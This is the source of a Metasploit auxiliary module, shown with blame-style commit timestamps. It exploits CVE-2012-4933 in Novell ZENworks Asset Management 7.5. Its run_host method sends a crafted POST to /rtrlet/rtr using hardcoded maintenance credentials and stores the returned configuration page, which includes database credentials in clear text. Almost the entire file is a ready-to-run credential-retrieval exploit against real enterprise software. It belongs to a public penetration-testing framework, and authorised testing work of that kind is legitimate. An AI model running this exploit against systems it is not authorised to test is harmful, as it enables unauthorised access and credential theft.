metasploit-framework/modules/auxiliary/scanner/http/zenworks_assetmanagement_ge...

69 lines
2.3 KiB
Ruby
Raw Normal View History

2012-10-15 14:03:19 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2012-10-15 14:03:19 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management 7.5 Configuration Access',
'Description' => %q{
This module exploits a hardcoded user and password for the GetConfig maintenance
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
Console and can be triggered by sending a specially crafted request to the rtrlet component,
allowing a remote unauthenticated user to retrieve the configuration parameters of
Nozvell Zenworks Asset Managmment, including the database credentials in clear text.
This module has been successfully tested on Novell ZENworks Asset Management 7.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez' # Also the discoverer
],
'References' =>
[
[ 'CVE', '2012-4933' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ]
]
))
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(8080),
])
2013-08-30 21:28:54 +00:00
end
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
def run_host(ip)
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => '/rtrlet/rtr',
'method' => 'POST',
'data' => post_data,
}, 5)
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
print_good("#{rhost}:#{rport} - File retrieved successfully!")
path = store_loot(
'novell.zenworks_asset_management.config',
'text/html',
ip,
res.body,
nil,
"Novell ZENworks Asset Management Configuration"
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
return
end
2012-10-15 14:03:19 +00:00
2013-08-30 21:28:54 +00:00
end
2012-10-15 14:03:19 +00:00
end